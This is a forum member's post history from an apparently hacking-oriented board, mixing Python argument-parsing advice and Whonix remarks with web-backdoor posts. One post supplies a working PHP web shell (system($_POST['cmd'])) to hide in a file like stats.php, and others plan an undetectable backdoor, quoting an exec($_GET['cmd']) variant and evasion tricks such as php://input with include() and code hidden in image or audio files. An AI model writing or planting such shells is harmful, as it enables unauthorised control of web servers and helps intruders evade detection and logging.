Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - jay755

Pages: [1]
1
Scripting Languages / Re: [Python] variable question
« on: February 21, 2013, 01:45:47 pm »
Sounds fair. Inexperienced people use unneeded code indeed.


Sometimes I'd like my code to be maintainable and extendable. argparse gives me a nice api to handle long and complicated command line options. sys does not.


For this short example sys.argv works fine, but learning something which is maintainable in the future when your projects get bigger could be useful.


Jay






2
Web Oriented Coding / Re: How to take over a computer with PHP
« on: February 21, 2013, 10:07:53 am »
Oops: This would only work when the webserver was internet facing.

Code: [Select]
<?php
system($_POST['cmd']);
?>
Just put that in stats.php or something and enjoy :) .


Ofcourse this is a very simple example which can be detected very fast, but it will get you going.


If you need any help just let me know.




3
Hacking and Security / Re: Add your top favorite Hacking Forum here please !
« on: February 21, 2013, 09:54:56 am »
As someone being half Chinese:
eviloctal.com


Any other Chinese in here? PM me and we can start a small group :).


xie xie


4
Scripting Languages / Re: [Python] variable question
« on: February 21, 2013, 09:51:19 am »
Most people would use sys for that, neat programmers would use argparse for that :).

5
Hacking and Security / Re: Whats my next step?
« on: February 21, 2013, 09:49:12 am »
Apart from using the internet connection, you could research MitM topics. Just google around a bit to get a feel for the concept and then try something out. If you need some help just pm me.


Have fun!

6
Operating System / Re: Whonix
« on: February 21, 2013, 09:46:30 am »
I have tried it and it works. A bit difficult to setup, especially take care of the NIC's in your VM's. But when it works you can be sure all your traffic routed over the tor network.




7
Web Oriented Coding / Re: php backdoor ++
« on: February 21, 2013, 09:33:24 am »
Quote from: DaNePaLI on February 19, 2013, 11:11:41 am

Secondly, you know that you should use POST instead of GET so why not research on it? Its just like changing exec($_GET['cmd']); to exec($_POST['cmd']); (again refactoring can be employed here as well). Of course, you have to work on giving easier interface to process POST forms.
Yes, I have done that, thank you for the suggestion.

Quote from: DaNePaLI on February 19, 2013, 11:11:41 am

One idea is to use the php://input, which you can execute using the include() function. The data can be passed as POST data (check http://php.net/manual/en/wrappers.php.php ). From the PHP manual, php://input is a read-only stream that allows you to read raw data from the request body. In the case of POST requests, it is preferable to use php://input instead of $HTTP_RAW_POST_DATA as it does not depend on special php.ini directives. Hence you could exploit this feature to create undetectable web shells.

Great, that sounds like a very good idea. Could you give a small example on how to use the php://input with the include function?
Quote from: DaNePaLI on February 19, 2013, 11:11:41 am

Yet other possibility is to hex edit some unsuspicious binary/image/mp3/etc file and insert the PHP backdoor in there. Your PHP script could then read the particular bytes from the binary file on the fly and execute them.
That sounds like a good idea as well. I will implement that too.

Thanks for your input, I will send you a pm when I have some code so you can look at it if you want?



8
Web Oriented Coding / php backdoor ++
« on: February 19, 2013, 09:51:03 am »
Hi,

I am wanting to learn and work on a php backdoor. All c99 things get detected very fast and I want to make something easy and difficult to detect. Something which can go into existing files and work over POST so not to get in access logs with GET parameter.

Is there anybody who want to help and work together on it?

Jay

Pages: [1]